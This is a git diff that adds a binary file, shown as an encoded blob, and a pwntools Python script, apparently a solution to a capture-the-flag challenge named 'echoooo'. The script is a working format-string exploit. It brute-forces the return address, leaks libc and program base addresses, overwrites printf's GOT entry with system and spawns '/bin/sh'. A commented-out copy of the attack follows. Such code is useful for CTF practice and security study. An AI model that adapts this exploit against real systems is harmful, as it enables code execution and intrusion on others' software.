zg6GTmd6r8S&S=M<0q$Zm+i^nZ+w1vjj?e5@f8u^-w(mv2=R+KDg{x zF7fLsJrCERGe|MeM?dy<84%^-+Ad5-_?fW`#|2{|k5<6HC;a^3I*DuZIb+EE5O9ox zz1+>H?=JKF@5yLcEeET`dRSb|sC|j7re+jvK!GhPQfd~qoQS8DzGS*PmQ>K{0Eb&rpANe(8f@CC8al!N+_{RCN`v~DJ?U^dNZ*BRf*>Y28O`I#3`VuSyUCJ zWqV{xREchFRuoXSD8!l4{PnGoEp3~v625l^K(I-Q5|xDqxp_NNTHCiZMcS2ZEiF5u zJC&W0ruHa$kli$ck-}8 ziW-k;F|k94Rm8Ulu|oGk)!^#-RHeb#JH#r+4MwcUjNL@+Vl3U*NQA+LCCQ|k>Qf;i zmiCeka!Y;7%x3q;$pW!N<-mn?+Y(!R*k07V8G8WenO+IoNDP%?z?&Dy^x(zEmza zm;uKbZO8<5=Mu14Pa-a$NK;!q#FcUN{#dr31>-|0D8isx#*pk)GucEsWnmPM!4=2Q zK;#CK8VmAp1R)#Dsy!^IsrvxLdjXWvywQVdzv%t_ad1MMVQSn4h6UxJgxEj=ob{!_ z7o5;N)DU}65aP>%a6=BjO~#)E|IG>CT;P!g?*>NldnBHr{kLcwCd6Eq@<>;}Q3D6r zhlM@uHx&SxInn<&!Zt$2Y`f8 zwW$8%qWp1Tzgn2i64YM*7~uF@C)v~c|4Cur;W7;I8Zk@u@MgkO0?w#P_B2lLi+?yY zel@fWACyOW4;(mlBzqc992EA{epG+bBl-Z?<5-k<8h0EK_5qM%ve(~085@NR#+2-7 zd~!zEcL_x*-+uky74}U+kH*tsVQ|J|k1?~`KMfehmHacG1RNxvLF{kl_V)iisG02p z!agAE#|<~dvw+Dxd(LJ*A?zoF;#kqr$k^=<+3ab5y$*PV!SvDsgVLGoiT^2N%=M@7 zSnVo9gXUpK-+ukS6!z49^xnjOFb7$f3QW%YsF-y#lCBZ_<3A1n6L=^ tQef-hpzEgRFV4$R-3<%le5Tc)hi%TOT++qcw48nZRzqW%&A`U8e*ke?QSbl& literal 0 HcmV?d00001 diff --git a/random_challs/echoooo/a.py b/random_challs/echoooo/a.py new file mode 100644 index 0000000..753c575 --- /dev/null +++ b/random_challs/echoooo/a.py @@ -0,0 +1,69 @@ +#!/usr/bin/python3 + +from pwn import * +import re + +context.binary = target = ELF("./chal", checksec=False) +libc = target.libc + +# bruteforce lower 12 bits +def brute(): + for a in range(1, 256): + for b in range(8, 256, 16): + r = process() + partial_ret = (a << 8) | b + write = (0x61 - (partial_ret & 0xff)) & 0xff + buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode() + buf += f"%{write}c%48$hhn".encode() + r.sendlineafter(b": ", buf) + try: + r.recvuntil(b"Type") + return r, partial_ret + except: + r.kill() + continue + +# leak +r, partial_ret = brute() +log.info("ret: %#x", partial_ret) +buf = f"%97c%48$hhn".encode() +buf += b"AAAA%17$p.%19$p" +r.sendlineafter(b": ", buf) +r.recvuntil(b"AAAA") +leaks = re.findall(r'0x[a-z0-9]+', r.recvS()) +libc.address = int(leaks[0], 16) - 0x29d68 +log.info("libc: %#x", libc.address) +target.address = int(leaks[1], 16) - 0x1169 +log.info("elf: %#x", target.address) + +# write +partial_ret = int(hex(libc.sym.system)[-4:], 16) +buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf) +r.sendline(buf) +r.sendline(b"/bin/sh") + +r.interactive() + +""" +# write +partial_ret = 0xe068 +write = (0x61 - (partial_ret & 0xff)) & 0xff +buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode() +buf += f'%{write}c%48$hhn'.encode() +s(buf) + +# leak +buf = f"%97c%48$hhn".encode() +buf += b"AAAA%17$p.%19$p" +s(buf) +r.recvuntil(b"AAAA") +leaks = re.findall(r'0x[a-z0-9]+', r.recvS()) +libc.address = int(leaks[0], 16) - 0x29d68 +target.address = int(leaks[1], 16) - 0x1169 +log.info("elf: %#x", target.address) + +# write +partial_ret = 0x38f0 +buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf) +r.sendline(buf) +""" \ No newline at end of file